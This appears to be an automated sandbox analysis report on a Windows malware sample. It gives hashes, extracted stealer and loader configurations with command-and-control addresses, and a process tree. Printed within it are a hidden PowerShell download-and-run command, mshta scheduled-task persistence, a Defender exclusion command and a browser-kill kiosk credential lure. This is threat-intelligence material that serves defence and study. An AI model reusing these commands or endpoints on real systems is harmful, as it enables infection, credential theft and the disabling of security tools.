Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 17:59

General

  • Target

    daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe

  • Size

    1.8MB

  • MD5

    44432f95b130ce27ffe942af9562c738

  • SHA1

    8d44dd529c59881f2e728593b373f2eff42be305

  • SHA256

    daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca

  • SHA512

    48c8b0f3d62a8d81129129e80bd432d949a644023a88568fb1aa5fce8c6731f70c5282bc981ad68cfd3eb1fc5ef3ac380dd29b2daf8577c265a24c6140481ff0

  • SSDEEP

    24576:mbsa4Csaaeb3mSAIfnn8SUFrUL299r2qoCwYl2Rg6atG4pk8H1w4I7HhrYFAOOtw:WQmhnc9rr2RxalblILoAVbuAjJ4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 11 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 16 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 47 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 43 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 34 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe
    "C:\Users\Admin\AppData\Local\Temp\daa1a8bd2f692cf85ebdbe3c66dbbf3801e9dac297aabf1a30d8ea616524a6ca.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:1560
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1280
      • C:\Users\Admin\AppData\Local\Temp\10104610101\7607ece8f4.exe
        "C:\Users\Admin\AppData\Local\Temp\10104610101\7607ece8f4.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn mJHP7maUCBd /tr "mshta C:\Users\Admin\AppData\Local\Temp\pWd19P6A0.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3496
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn mJHP7maUCBd /tr "mshta C:\Users\Admin\AppData\Local\Temp\pWd19P6A0.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:768
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\pWd19P6A0.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:5028
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'A1U9PPL2BUQGW7EU3PQAWJ4ZZT0WMKZL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2428
            • C:\Users\Admin\AppData\Local\TempA1U9PPL2BUQGW7EU3PQAWJ4ZZT0WMKZL.EXE
              "C:\Users\Admin\AppData\Local\TempA1U9PPL2BUQGW7EU3PQAWJ4ZZT0WMKZL.EXE"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4768
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4824
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:1820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3196
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4284
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3792
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn "CQloNmar83F" /tr "mshta \"C:\Temp\A5SoPtEJk.hta\"" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:4040
        • C:\Windows\SysWOW64\mshta.exe
          mshta "C:\Temp\A5SoPtEJk.hta"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4904
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:692
            • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
              "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1572
      • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
        "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4208
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\KnAqqy7y\Anubis.exe""
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1720
      • C:\Users\Admin\AppData\Local\Temp\10105330101\cfee799339.exe
        "C:\Users\Admin\AppData\Local\Temp\10105330101\cfee799339.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3288
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          PID:3484
      • C:\Users\Admin\AppData\Local\Temp\10105340101\76bad964a3.exe
        "C:\Users\Admin\AppData\Local\Temp\10105340101\76bad964a3.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4752
        • C:\Users\Admin\AppData\Local\Temp\10105340101\76bad964a3.exe
          "C:\Users\Admin\AppData\Local\Temp\10105340101\76bad964a3.exe"
          4⤵
          • Executes dropped EXE
          PID:1892
        • C:\Users\Admin\AppData\Local\Temp\10105340101\76bad964a3.exe
          "C:\Users\Admin\AppData\Local\Temp\10105340101\76bad964a3.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:1484
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4752 -s 820
          4⤵
          • Program crash
          PID:4904
      • C:\Users\Admin\AppData\Local\Temp\10105350101\beae2dd8e6.exe
        "C:\Users\Admin\AppData\Local\Temp\10105350101\beae2dd8e6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1708
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          PID:368
      • C:\Users\Admin\AppData\Local\Temp\10105360101\19ab1ca738.exe
        "C:\Users\Admin\AppData\Local\Temp\10105360101\19ab1ca738.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2848
      • C:\Users\Admin\AppData\Local\Temp\10105370101\4d95cee84f.exe
        "C:\Users\Admin\AppData\Local\Temp\10105370101\4d95cee84f.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3328
      • C:\Users\Admin\AppData\Local\Temp\10105380101\bf2e8af16e.exe
        "C:\Users\Admin\AppData\Local\Temp\10105380101\bf2e8af16e.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Downloads MZ/PE file
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1932
        • C:\Users\Admin\AppData\Local\Temp\NSOAIJQ97QW29XUM.exe
          "C:\Users\Admin\AppData\Local\Temp\NSOAIJQ97QW29XUM.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4460
      • C:\Users\Admin\AppData\Local\Temp\10105390101\e20ae5b59c.exe
        "C:\Users\Admin\AppData\Local\Temp\10105390101\e20ae5b59c.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2764
      • C:\Users\Admin\AppData\Local\Temp\10105400101\ef09bbcc79.exe
        "C:\Users\Admin\AppData\Local\Temp\10105400101\ef09bbcc79.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:3288
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM firefox.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1560
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM chrome.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3536
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM msedge.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3408
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM opera.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1796
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM brave.exe /T
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4076
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
          4⤵
            PID:4340
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
              5⤵
              • Checks processor information in registry
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of SetWindowsHookEx
              PID:3984
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 27209 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b401cb0a-32d7-4df8-ac87-55164feca3ce} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" gpu
                6⤵
                  PID:1336
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 28129 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee6d26bb-ec51-4e44-aba4-026b1d2c36e8} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" socket
                  6⤵
                    PID:3720
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3036 -childID 1 -isForBrowser -prefsHandle 3028 -prefMapHandle 3024 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ff61f75-55d8-4536-b2cb-f92903507fd0} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" tab
                    6⤵
                      PID:4672
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4116 -prefMapHandle 4112 -prefsLen 32619 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2d309d6-3a4f-4652-9098-f738d0df7887} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" tab
                      6⤵
                        PID:3700
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4820 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4812 -prefMapHandle 4808 -prefsLen 32619 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {548ee5cb-877f-4f34-bfcf-2b4dcfe24799} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" utility
                        6⤵
                        • Checks processor information in registry
                        PID:5368
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5376 -childID 3 -isForBrowser -prefsHandle 5388 -prefMapHandle 5384 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8b74f538-58ac-4904-80ef-d24121139574} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" tab
                        6⤵
                          PID:5916
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5620 -childID 4 -isForBrowser -prefsHandle 5508 -prefMapHandle 5512 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2a1be736-3788-434f-93e6-92f2f6c05c18} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" tab
                          6⤵
                            PID:5928
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5396 -childID 5 -isForBrowser -prefsHandle 5416 -prefMapHandle 5388 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9909b946-e8ac-4058-b322-338ed3c15b8e} 3984 "\\.\pipe\gecko-crash-server-pipe.3984" tab
                            6⤵
                              PID:5948
                      • C:\Users\Admin\AppData\Local\Temp\10105410101\8f2979472f.exe
                        "C:\Users\Admin\AppData\Local\Temp\10105410101\8f2979472f.exe"
                        3⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        • Modifies Windows Defender Real-time Protection settings
                        • Modifies Windows Defender TamperProtection settings
                        • Modifies Windows Defender notification settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1576
                      • C:\Users\Admin\AppData\Local\Temp\10105420101\ce4pMzk.exe
                        "C:\Users\Admin\AppData\Local\Temp\10105420101\ce4pMzk.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5240
                      • C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe
                        "C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"
                        3⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:5476
                        • C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe
                          "C:\Users\Admin\AppData\Local\Temp\10105430101\mAtJWNv.exe"
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          PID:5516
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 5476 -s 800
                          4⤵
                          • Program crash
                          PID:5620
                      • C:\Users\Admin\AppData\Local\Temp\10105440101\SvhQA35.exe
                        "C:\Users\Admin\AppData\Local\Temp\10105440101\SvhQA35.exe"
                        3⤵
                        • Executes dropped EXE
                        PID:5864
                        • C:\Users\Admin\AppData\Local\Temp\onefile_5864_133856713235238871\chromium.exe
                          C:\Users\Admin\AppData\Local\Temp\10105440101\SvhQA35.exe
                          4⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5308
                      • C:\Users\Admin\AppData\Local\Temp\10105450101\FvbuInU.exe
                        "C:\Users\Admin\AppData\Local\Temp\10105450101\FvbuInU.exe"
                        3⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        PID:5384
                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                    1⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3452
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4752 -ip 4752
                    1⤵
                      PID:4896
                    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                      C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                      1⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2696
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5476 -ip 5476
                      1⤵
                        PID:5528
                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                        1⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        PID:5320

                      Network

                      MITRE ATT&CK Enterprise v15

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\1B0F70E0C12D7BDD.dat

                        Filesize

                        156KB

                        MD5

                        8229f6ae3a063b2433c2ce32fcc48a40

                        SHA1

                        7a96e57d19170045a3f2964d524c755e276f9b0a

                        SHA256

                        4a459a74cd12e412c62c1010179b71e5b44486c0bcb9436efba0b1208a7226a9

                        SHA512

                        33369f89e9d60f04623a04a02c5829c551c07e82c9a77cd04c3fa7d4d09a2f91ad99e5fb450e2b90383f38851f927d453b9073c1102d9f1ec1efb895ed628c80

                      • C:\ProgramData\g4opz\qqi5xlxt0

                        Filesize

